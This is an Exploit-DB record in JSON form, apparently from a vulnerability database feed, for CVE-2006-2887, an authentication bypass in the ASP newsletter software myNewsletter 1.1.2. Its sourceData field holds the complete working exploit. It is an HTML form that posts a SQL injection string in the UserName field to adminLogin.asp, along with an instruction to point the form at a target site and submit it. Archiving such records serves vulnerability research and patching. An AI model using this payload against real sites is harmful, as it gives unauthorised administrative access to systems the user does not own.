{"id": "EDB-ID:1884", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "myNewsletter 1.1.2 - 'adminLogin.asp' Authentication Bypass", "description": "", "published": "2006-06-06T00:00:00", "modified": "2006-06-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/1884", "reporter": "FarhadKey", "references": [], "cvelist": ["2006-2887"], "immutableFields": [], "lastseen": "2022-01-13T07:12:37", "viewCount": 66, "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://www.exploit-db.com/download/1884", "sourceData": "<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->\r\n<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit\r\n</center><form name=\"adminLogin\" method=\"post\" action=\"http://site/newsletter/adminLogin.asp\">\r\n<input type=\"hidden\" name=\"UserName\" value=\"<!--'union select 1 from Newsletter_Admin where ''='\">\r\n<input type=\"hidden\" name=\"Password\" value=\"1\">\r\n<center><br><input type=\"submit\" name=\"Submit\" value=\"Login\"></center><br><br>\r\n<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->\r\n<center><a href=\"http://www.kapda.ir\">www.kapda.ir</a></center>\r\n</form>\r\n</html>\r\n\r\n# milw0rm.com [2006-06-06]", "osvdbidlist": ["26127"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1645223904}}
{}
myNewsletter 1.1.2 - 'adminLogin.asp' Authentication Bypass